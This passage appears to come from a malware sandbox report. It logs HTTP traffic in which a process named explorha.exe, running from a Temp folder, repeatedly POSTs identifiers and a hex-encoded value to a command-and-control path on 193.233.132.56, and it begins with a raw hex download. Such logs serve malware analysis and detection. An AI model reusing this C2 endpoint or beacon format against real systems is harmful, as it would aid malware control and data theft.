                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245522976 CEST1289INData Raw: 86 9a 39 92 92 cd b5 9f 70 23 84 e7 e0 89 86 f5 b7 3f eb 41 1e 04 31 00 f7 3b c7 0f 43 f0 24 81 fe 76 6e 83 8d 46 23 02 79 3b c6 0f 86 e3 a0 8d eb bf 85 f6 26 74 16 73 14 41 45 97 a0 c6 45 68 e4 3f 3c 39 1a 33 ff 15 04 84 e4 f6 53 51 1d 2c 06 25
                                                                                                                                                                                                                                      Data Ascii: 9p#?A1;C$vnF#y;&tsAEEh?<93SQ,%69;uPU)H\-PA#CP4RZr=)KIIHR/3;Pd710c>u0yjxE.^`^u=$H#`vP63@"Ut,AAQ
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245563030 CEST1289INData Raw: f0 14 2e 44 a2 5f b4 f1 8d f0 c2 b8 9c 9d d0 17 e6 2f 90 13 0c 56 c4 6f 72 d3 50 46 9c fd 0c 7d f7 04 e1 f2 27 2c 5e 51 c0 b5 3a ce e8 24 e3 56 9d a0 df 6a 0d 68 9c 31 64 52 6c 84 f2 41 aa eb 09 bd 91 7b 69 79 17 79 8b c8 13 1a 77 a9 28 c0 b9 5e
                                                                                                                                                                                                                                      Data Ascii: .D_/VorPF}',^Q:$Vjh1dRlA{iyyw(^ f~>,'?sTi"p)NlBU~UjAG:Jp,[@.Bb4#d,{ O4qw[tFr`GKPu{~a~O`hX3E
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245604992 CEST1289INData Raw: e8 56 b8 a4 39 38 51 7a 6a 1c 00 d7 50 9c a5 5e af 82 21 16 8b 33 c0 6f b1 ad 6c 30 4d 25 f0 f9 4a 5b f4 69 71 5c 5b 3e 43 e1 92 8e e5 d1 80 ad 33 10 95 5b ed 08 40 a7 91 50 79 24 2f 8d 7f e2 09 5b 76 a5 73 fb 80 ca 8d 75 e5 85 c9 00 79 34 f7 d9
                                                                                                                                                                                                                                      Data Ascii: V98QzjP^!3ol0M%J[iq\[>C3[@Py$/[vsuy4fNA*0lTNuN-*.0T;uT0W+tAlwOi4RJ|uIW}Ox*=uJK;J`
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.245647907 CEST1289INData Raw: a0 00 b3 3c 4a 3b c7 26 74 2c c2 d0 1f 2b 26 5d f8 80 00 39 5e 10 72 5b 89 da 0a 78 08 ec 87 60 0e 33 d2 66 7a 89 18 59 eb 2e 72 f0 3b 18 d9 75 0d 4d 83 e3 98 d7 05 fb 06 7c 1c eb 93 83 49 dd 8e 33 3c 6a e2 e5 b7 f7 0d cf 21 b8 8b 18 d1 ff d8 6b
                                                                                                                                                                                                                                      Data Ascii: <J;&t,+&]9^r[x`3fzY.r;uM|I3<j!kW=m`'UAQ>[ZF?&`McO.rn,sA,{*Fg@+RI#HG1QCC$V%\PuBBn7si'O
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:22.493360043 CEST1289INData Raw: da 25 f6 73 c9 35 a0 90 dd b8 81 4a ec 95 33 83 f3 8d 71 d4 4b b4 c1 96 68 98 25 ba 97 1a d0 e0 53 70 0b 04 e8 52 ca f1 29 c6 d0 4c 76 50 ee 74 9c 72 8c aa fa 55 e0 97 e9 44 85 45 10 02 d3 64 84 0d 5b 10 e2 2e 2a 1d 27 66 92 94 af 28 4e 5c 45 48
                                                                                                                                                                                                                                      Data Ascii: %s5J3qKh%SpR)LvPtrUDEd[.*'f(N\EHJ7O?;P@i\<2='`OV@D4 .MB*lp"A#c x,Rl%sXHlNdm.dRx$r:AKpL|]6JnB|bmB$1P<fWf +I


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      12192.168.2.549768193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:25.875488043 CEST186OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 31
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 64 31 3d 31 30 30 30 30 35 37 30 33 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                      Data Ascii: d1=1000057031&unit=246122658369
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:26.126251936 CEST193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:25 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4 <c>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      13192.168.2.549769193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:26.487627983 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:26.732089996 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:26.736044884 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:26.984457016 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:26 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      14192.168.2.549770193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:27.334340096 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:27.581065893 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:27.581820011 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:27.832570076 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:27 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      15192.168.2.549771193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:28.233938932 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:28.476804018 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:28.555151939 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:28.810861111 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:28 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      16192.168.2.549772193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.255553007 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.498307943 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.501691103 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:29.748577118 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:29 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      17192.168.2.549775193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.100778103 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.349416018 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.350960970 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.604402065 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:30 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      18192.168.2.549779193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:30.961292028 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.208998919 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.212039948 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.464279890 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      19192.168.2.549785193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:31.835582972 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:32.080806017 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:31 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:32.082199097 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:32.332559109 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      20192.168.2.549792193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:32.692337036 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:29:32.936714888 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:32 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
